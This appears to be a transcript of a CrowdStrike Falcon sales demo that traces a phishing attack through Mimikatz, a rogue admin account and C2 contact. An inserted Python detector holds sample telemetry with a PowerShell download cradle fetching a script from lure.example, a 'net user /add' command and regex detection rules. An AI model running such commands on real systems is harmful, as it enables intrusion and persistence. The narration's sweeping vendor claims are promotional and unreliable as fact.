CrowdStrike Falcon Endpoint Protection Platform Overview and Demo
CrowdStrike has revolutionized endpoint protection by unifying next-gen AV, EDR, and 24/7 managed threat hunting — all delivered via a single lightweight agent. Watch now as Dan Larson, VP of Product Marketing, shares the CrowdStrike story. Understand how CrowdStrike Falcon protects customers against all cyber attacks, how it is certified to replace legacy AV, and why the Falcon Platform has reinvented the way endpoint security is delivered with its industry-leading, cloud-native architecture.
Cloud Delivered Endpoint Protection - CrowdStrike Product Overview and Demo
Hello, and thanks for joining us today. My name is Dan Larson from CrowdStrike. CrowdStrike is an endpoint security company that’s setting the new standard in endpoint protection. Our promise is simple. We stop breaches. How can we make that claim? Well, it’s pretty simple if you step back and look at it.
We have five years of experience in providing protection to our global customers, and in that time zero of our customers have had a reportable breach. How do we do it? We provide wire-speed visibility into all of your endpoints, and combine it with proprietary breach protection technology and services. This endpoint security market is too full of FUD. It’s better to show you how we’re different than to tell you about it. So let’s get started.
As CrowdStrike has grown, many of the world’s largest organizations have trusted us to secure their endpoints, and ultimately to protect them from breaches. At the end of the day, customers are voting with their budgets. We’re growing 100% year over year, and adding 100 new logos every quarter. These customers hold us to a high standard, and we have a customer retention rate of over 98%. If you select CrowdStrike, you’ll be in good company.
The company was founded five years ago by George and Dmitri, both longtime security executives who were frustrated with traditional endpoint protection being fossilized without the advantages of modern innovations. We raised over $100 million from three very different investors. The Google investment really validated the massive innovations that we’ve created under the hood. Accel recognized the early growth in market adoption. Warburg Pincus sees the focus on fundamental economics, and is offering its expertise and scale as the largest PE firm in the world. As a company we continue to capture great industry recognition from the likes of Gartner, Forbes, and Inc. 500 for both our technology and our market leadership.
We’ve heard our customers loud and clear. The solutions are too complex, and more importantly, they’re ineffective against modern threats. They’re frustrated by the ever-growing complexity of their security architecture. Legacy vendors are continually asking them to add more components to an already complex solution. This makes it harder to manage, and also taxes the endpoints to the point where it interferes with employee productivity. And even with all of that investment and effort, they simply aren’t moving the needle from a security perspective. Incidents, outbreaks, and breaches continue to plague organizations.
Making matters worse, all of these legacy solutions are still built on signature-based technologies. Signatures are woefully ineffective in the modern threat landscape. Signatures have massive blind spots for things like fileless attacks, and abuse of legitimate system tools like PowerShell. Signatures also require human interaction to build. This leaves the customer exposed to new threats for days at a time, because it takes human analyst time to investigate the threat. Then it takes more time to create the signature, and then even more time to distribute the signature. While that process is underway, the attacker has free rein over the target environment.
CrowdStrike represents a radically new approach. We have combined all those security capabilities into a single lightweight agent that’s powered by artificial intelligence rather than signatures. We call it CrowdStrike Falcon. This allows us to deliver anti-malware protection without the need for daily signature updates, but this is just the beginning. That same agent also uses our new protection mechanisms like machine learning, behavioral analytics, and continuous monitoring to provide protection against today’s more sophisticated malware free attacks.
Falcon gives you much better protection, while also being invisible to your end users. It also represents an opportunity to remove legacy solutions. These include antivirus, host intrusion prevention, IOC scanning tools, sandboxes, and more. At the end of the day, you’ll have a much more effective solution that doesn’t slow down your systems. And that solution is delivered by the Falcon platform. With a single agent and a single management interface, we can deliver complete endpoint protection against today’s threats by providing next-gen antivirus, endpoint detection and response, and a managed threat hunting service.
Because this is built as a platform, we can continually add apps and services to adapt to the ever changing threat landscape. For example, we also provide a threat intelligence service and an IT hygiene app on the platform. But this list of apps and services is continually growing. To show the power of the platform, we’ve set up a demo to show you all the parts of the platform in action against a modern threat.
In this demo you’re going to see a modern attack from the CrowdStrike perspective. What distinguishes a modern attack from older attacks is really three key characteristics. First they begin with a fileless infection. By not writing anything to disk, they can bypass most Legacy AV Solutions. Second, once they have control of the system, they use built-in tools like PowerShell to evade detection. Again, this is a blind spot for Legacy AV Solutions, because they trust those built-in tools, and lack the capability to investigate the particulars of what those tools are doing.
Finally, the modern attack will persist in the environment by establishing backdoors that are so subtle that they slip past detection by most security tools. These techniques are an obvious choice for attackers, because they allow them to easily bypass antivirus, firewalls, application whitelisting solutions, and even sandboxes. They do not, however, bypass CrowdStrike, and that is exactly what you’re going to see in this demo.
This is our management console. All of our apps and services are managed here. On the left-hand side, you can see all the apps that you have access to. These apps give you the ability to manage your implementation of Falcon, and also give you the visibility necessary to identify, investigate, and remediate threats. In fact, that visibility is a foundational element of our solution. We operate as a DVR for your endpoint, recording all activity so that it can be understood in a security context.
This data also provides basic IT hygiene data so that you can understand where you have coverage, and where you don’t. This includes information on managed and unmanaged systems, as well as insight into application usage and privileged account usage. This raw visibility is incredibly powerful, but where CrowdStrike really shines is in its ability to automatically identify threats in that data set.
So let’s go to the activity app to investigate a threat that we recently automatically identified. This is the process tree that shows the complete context. It really tells the whole story of the attack. The most obvious part of the attack is this icon indicating that a piece of malware was blocked. You can see that our machine learning identified this file as malicious, and prevented it from executing. This little sliver of the attack is what you’re used to seeing with a legacy AV solution.
CrowdStrike goes far beyond simply showing when it blocks a piece of malware. It provides a complete view of the attack in real time. It also provides forensic details on the right-hand side of the screen to speed investigation and response. This level of detail would take days or weeks to compile with Legacy tools, but you can see that we deliver a live view of forensic details right alongside the process tree.
To better understand this attack, we simply move up the process tree. In this case, we see that the incident started in Outlook. From Outlook the user clicked the link, and launched Internet Explorer. The web site was able to exploit a vulnerability in Internet Explorer in order to instigate a drive-by download. This tells me that I’m dealing with a phishing attack.
More importantly, I can see that the attacker was successful, and that this attack is ongoing. Now that he has remote control of the system, he begins working towards his goal. The easiest option for the attacker was to drop malware, but that was blocked. So now it’s time to use the tools that won’t be blocked. In this case, he’s using the Windows command prompt, but attackers will use just about anything that’s built into the system like PowerShell, WMI, PsExec, or scripting files like batch files or VBS files.
Legacy tools cannot see malicious actions being taken by these utilities, because they are trusted tools. CrowdStrike sees all activity on the machine. Even activity carried out by trusted applications. This makes it easy to see the malicious activity. In fact, we can see every single operation done by the attacker down to the specific commands he typed in the command line.
In this case, we see that he started by using whoami to see if he has admin rights. He does not, so now he has to get some admin credentials. To do this he invokes a PowerShell script that downloads a credential-stealing tool called Mimikatz, and injects it into running memory, again to avoid writing anything to disk. He then uses this tool to get the password for the system admin account. He can now continue his attack with completely legitimate credentials, making it impossible for most security tools to distinguish him from a legitimate administrator.
It looks like he then took it a step further, and also created a second administrative account on the system. This enables him to persist on the system even if someone realizes that the admin account was compromised. We then see the attacker attempting to ping his command and control server. This particular domain is known by CrowdStrike intelligence to be malicious. To learn more about this indicator, we can pivot to the actor’s app to see what else CrowdStrike knows about this attacker.
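An added example, not CrowdStrike’s code or the Falcon platform’s own logic: a small Python detector run over constructed process telemetry that reconstructs the process tree and flags each stage of the chain just described (a shell spawned from Outlook via Internet Explorer, whoami reconnaissance, a PowerShell download cradle, a new local admin account, and a ping to a known C2 domain). The event tuples, the C2 list and the rule names are assumptions made for the example.

```python
"""Added example (not CrowdStrike's code): build a process tree from constructed
endpoint telemetry and flag the stages of the demo attack chain."""
import re

# Constructed sample telemetry: (pid, ppid, image, command line).
EVENTS = [
    (100, 1, "explorer.exe", "explorer.exe"),
    (200, 100, "outlook.exe", "outlook.exe"),
    (300, 200, "iexplore.exe", "iexplore.exe http://lure.example/"),
    (400, 300, "cmd.exe", "cmd.exe"),
    (401, 400, "whoami.exe", "whoami"),
    (402, 400, "powershell.exe",
     "powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('http://lure.example/s.ps1')"),
    (403, 400, "net.exe", "net user svc_backup2 P@ss /add"),
    (404, 400, "ping.exe", "ping c2.example"),
    (500, 100, "ping.exe", "ping intranet.corp"),   # benign control case
]

# Constructed indicator list standing in for threat-intel C2 domains.
KNOWN_C2 = {"c2.example"}

def ancestry(pid, by_pid):
    """Return lower-cased image names from the process up to the root."""
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid][2].lower())
        pid = by_pid[pid][1]
    return chain

# Command-line rules for the built-in-tool stages of the attack.
RULES = [
    ("recon_whoami", re.compile(r"^\s*whoami\b", re.I)),
    ("ps_download_cradle",
     re.compile(r"powershell.*(downloadstring|iex\b|invoke-expression)", re.I)),
    ("local_admin_added", re.compile(r"\bnet\s+user\b.*\s/add\b", re.I)),
]

def detect(events):
    """Return (pid, finding) pairs for every suspicious process in the telemetry."""
    by_pid = {e[0]: e for e in events}
    findings = []
    for pid, ppid, image, cmd in events:
        chain = ancestry(pid, by_pid)
        # Mail client -> browser -> shell is the drive-by chain from the demo.
        if image.lower() == "cmd.exe" and "iexplore.exe" in chain and "outlook.exe" in chain:
            findings.append((pid, "shell_from_browser_via_mail_client"))
        for name, rx in RULES:
            if rx.search(cmd):
                findings.append((pid, name))
        # Outbound contact to a domain on the intel list, as with the ping to C2.
        m = re.match(r"\s*ping(\.exe)?\s+(\S+)", cmd, re.I)
        if m and m.group(2).lower() in KNOWN_C2:
            findings.append((pid, "c2_domain_contact"))
    return findings
```

Running `detect(EVENTS)` yields one finding per stage of the chain and nothing for the benign ping, which is the process-tree context that a file-centric signature scan would not surface.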
A quick search reveals that this C2 server is known by CrowdStrike intelligence to be associated with a Russian adversary known as Fancy Bear. This level of threat intelligence is unique to CrowdStrike, and enables you to further explore the incident, understand potential alternative attack vectors, and work towards predicting future attacks.
In this case, we can take their other known C2 domains, and see if anyone in our environment is connecting to them. In seconds we can see all systems currently connected to those domains, and also all systems that have ever connected to those domains in the past. Retrospectively searching for data like this is extremely difficult, but we can do it in real time because of our threat graph.
Interestingly, that very same data in the threat graph, is also being proactively investigated by our Falcon Overwatch team on a 24 by 7 basis. They act as active partners in the defense of your environment. And in this case, they also saw the threat, and thought it was severe enough for you to be alerted. Not only did they alert you to the threat, but they also provide full details on the attack, and share their expertise with you to help guide remediation. This kind of assistance is a huge value add for both mature security operations centers, as well as organizations that do not yet have a fully staffed SOC.
The good news is that I now have confirmation that only one of my systems is talking to any of these domains. So we can jump back into that investigation. The alarming thing about the state of the system is that this ping command is currently running. This means the attacker is live inside my environment right now. To kick the attacker out and to mitigate the spread of the threat, we can network contain the system. This containment survives reboots, and also comes with the flexibility to block all connections except those that are made to the Falcon platform or to other security tools that you specify.
You can see the attacker system in the corner, and you see that as soon as I hit the contain button, the attacker loses his access. The attack has been kicked off the system, and the security team can now move forward with confidence. Now that the situation is under control, we can begin to track and ultimately close out the issue. Here we assign the case to our investigations team.
At this moment, we can zoom out and recap everything that just happened. It’s also important to note that for the sake of this demo, we set our policies to merely detect rather than block the various stages of the attack. But please understand that we have full blocking capability, and could have stopped this threat at multiple points of the attack. It’s also crucial to understand the role that the Overwatch team plays in this. They see all activity across all customers, and use that global view to provide you with better protection.
Also, if you look at this attack, you can see that multiple protection mechanisms were used. We stopped the malware with machine learning. We used exploit protection features to identify the initial exploit. We used our system recording and behavioral analytics to identify the malware-free elements of the attack. We even had a real human, an expert threat hunter, chime in to help work the incident. While we have a number of competitors who can do bits and pieces of this, CrowdStrike is the only security company that can do it all.
Combining this complete level of protection and visibility with a cloud architecture that’s easy to implement and built on a single lightweight agent, you can see how we’re really changing the game for endpoint security solutions.
So what makes us different? We see everything that happens across the entire attacker kill chain. Our competitors only focus on a specific area in the kill chain. For example, Legacy AV vendors mainly focus on malware, and they’re mainly concerned with the delivery stage of the kill chain trying to identify the file as good or bad when it’s written to disk.
You also have sandboxes, host IPS, and other behavioral solutions, and those are effective at understanding if something is attempting an exploit, and can sometimes help prevent the delivery of the threat. And then there’s a whole other batch of solutions that don’t even make an attempt at prevention. Instead they search for indicators of compromise in the environment, or they try to uncover threats by triangulating data points from log files or other data sources.
The problem with each of these approaches is that they leave you with blind spots that then puts you in a situation where you either have to integrate multiple tools, or wait for one of the individual solutions to bolt on new capabilities. Both of these approaches are bad, because they result in untenable architectures and ever increasing agent bloat.
CrowdStrike is very different. We’re built from the ground up to address this problem, and see across the entire kill chain. Not only do we provide the protection necessary to block attacks as they happen, but we also record everything, like a DVR for your endpoint, so that those split second decisions can be re-evaluated at a later time. This re-evaluation is continually done by our technology and by our Overwatch team, but we also enable you to do proactive threat hunting, and investigations into your data.
The reason we can do all of these things is because of our platform. It is cloud based. It’s built on cutting edge graph database technology that powers our artificial intelligence, and every other aspect of our products and services. As new security needs arise, we simply build another app or service on top of the platform. This is why we are not dogmatic about any particular approach. We aren’t the machine learning company or the threat intel company. We’re the company that stops breaches, and uses whatever means necessary to get the job done.
Today we have five apps and services that run on the platform, but more are constantly being added both through in-house development and through our partner program. The benefits of the platform are really quite simple. Because we’ve built this from the ground up in the cloud and committed to delivering it with a single lightweight agent, you get better protection. Nobody else in the industry combines next-gen AV, EDR, and managed threat hunting in a single agent. It’s this combination of these three capabilities that really moves the needle from a security perspective.
You also get immediate time to value. Because we do SaaS delivery and have a silent installer with no reboots, you can start your deployment right away, and push to all systems immediately. We once deployed to 77,000 nodes in two hours with no help desk calls. And you get better performance. We offer all of this with a single agent that consumes less than 20 megs of disk space, less than 10 megs of memory, and less than 1% of CPU when active.
As you can see, CrowdStrike is easy to deploy and easy to use. It’s also important to recognize that it’s easy to integrate with your existing technology stack. With our CrowdStrike Elevate partner program, we partner with technology leaders from around the industry. This integration allows you to get more value from existing investments, and also creates opportunities for new integrated solutions and workflows. If you’ve got one of the products on this list, then CrowdStrike can make it better.
That’s a lot of information. So I’d like to just step back, and recap some of the highlights. First and foremost, CrowdStrike prevents all attack types. Second, we can provide five second visibility to every connected machine in your environment. And finally, we can reduce your costs while increasing your ability to stop breaches.
Well, that was a quick introduction of CrowdStrike. We can now dive deeper into any of the topics that we introduced. Where do you want to start?
For technical information on installation, policy configuration and more, please visit the CrowdStrike Tech Center.